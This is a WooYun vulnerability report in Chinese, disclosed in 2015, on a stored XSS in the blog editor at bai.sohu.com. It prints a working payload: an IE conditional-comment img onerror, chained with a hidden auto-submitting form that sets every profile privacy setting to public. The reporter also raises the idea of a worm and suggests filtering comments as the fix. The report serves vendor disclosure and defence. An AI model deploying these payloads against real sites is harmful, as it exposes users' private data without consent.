乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-01-22: 细节已通知厂商并且等待厂商处理中 2015-01-22: 厂商已经确认,细节仅向厂商公开 2015-02-01: 细节向核心白帽子及相关领域专家公开 2015-02-11: 细节向普通白帽子公开 2015-02-21: 细节向实习白帽子公开 2015-03-08: 细节向公众公开
编辑器允许编辑HTML哎!试试绕过吧~
啦啦啦
域名:bai.sohu.com写篇日志看看~咦 可以编辑 HTML 哎~~~切换到HTML模式写入
<!--[if IE]><img src=x onerror=alert()><![endif]-->
成功在 IE 下弹窗!
假如插入[if !IE]会被过滤掉 暂时利用条件是所有版本的 IE 但是又发现自定义的 <script>无效外部引入的js也无效但是没关系可以构造表单进行 XSRF 表单是有效的
<form method="POST" name="form0" action="http://bai.sohu.com:80/privacy/base.do"><input type="hidden" name="id_1" value="0"/><input type="hidden" name="level_1" value="-3"/><input type="hidden" name="id_2" value="0"/><input type="hidden" name="level_2" value="-3"/><input type="hidden" name="id_3" value="0"/><input type="hidden" name="level_3" value="-3"/><input type="hidden" name="id_4" value="0"/><input type="hidden" name="level_4" value="-3"/><input type="hidden" name="id_5" value="0"/><input type="hidden" name="level_5" value="-3"/><input type="hidden" name="id_6" value="0"/><input type="hidden" name="level_6" value="-3"/><input type="hidden" name="id_7" value="0"/><input type="hidden" name="level_7" value="-3"/><input type="hidden" name="id_8" value="0"/><input type="hidden" name="level_8" value="-3"/><input type="hidden" name="id_9" value="0"/><input type="hidden" name="level_9" value="-3"/><input type="hidden" name="id_10" value="0"/><input type="hidden" name="level_10" value="-3"/><input type="hidden" name="id_11" value="0"/><input type="hidden" name="level_11" value="-3"/><input type="hidden" name="id_12" value="0"/><input type="hidden" name="level_12" value="-3"/><input type="hidden" name="id_13" value="0"/><input type="hidden" name="level_13" value="-3"/><input type="hidden" name="cuslevel_13" value=""/><input type="hidden" name="pu_13" value=""/><input type="hidden" name="pg_13" value=""/><input type="hidden" name="bu_13" value=""/><input type="hidden" name="bg_13" value=""/><input type="hidden" name="id_14" value="0"/><input type="hidden" name="level_14" value="-3"/><input type="hidden" name="cuslevel_14" value=""/><input type="hidden" name="pu_14" value=""/><input type="hidden" name="pg_14" value=""/><input type="hidden" name="bu_14" value=""/><input type="hidden" name="bg_14" value=""/><input type="hidden" name="id_15" value="0"/><input type="hidden" name="level_15" value="-3"/><input type="hidden" name="cuslevel_15" value=""/><input type="hidden" name="pu_15" value=""/><input type="hidden" name="pg_15" value=""/><input type="hidden" name="bu_15" value=""/><input type="hidden" name="bg_15" value=""/><input type="hidden" name="id_16" value="0"/><input type="hidden" name="level_16" value="-3"/><input type="hidden" name="cuslevel_16" value=""/><input type="hidden" name="pu_16" value=""/><input type="hidden" name="pg_16" value=""/><input type="hidden" name="bu_16" value=""/><input type="hidden" name="bg_16" value=""/><input type="hidden" name="id_17" value="0"/><input type="hidden" name="level_17" value="-3"/><input type="hidden" name="cuslevel_17" value=""/><input type="hidden" name="pu_17" value=""/><input type="hidden" name="pg_17" value=""/><input type="hidden" name="bu_17" value=""/><input type="hidden" name="bg_17" value=""/><input type="hidden" name="id_18" value="0"/><input type="hidden" name="level_18" value="-3"/><input type="hidden" name="cuslevel_18" value=""/><input type="hidden" name="pu_18" value=""/><input type="hidden" name="pg_18" value=""/><input type="hidden" name="bu_18" value=""/><input type="hidden" name="bg_18" value=""/></form><img src=x onerror=form.submit()>
上面这段代码会把隐私设置里的个人档案权限全部公开,默认是不公开的
还可以伪造用户发一篇和我们一模一样的日志,蠕虫雏形?
过滤注释或者干脆取消自定义html 更方便?
危害等级:中
漏洞Rank:8
确认时间:2015-01-22 18:07
感谢支持。
暂无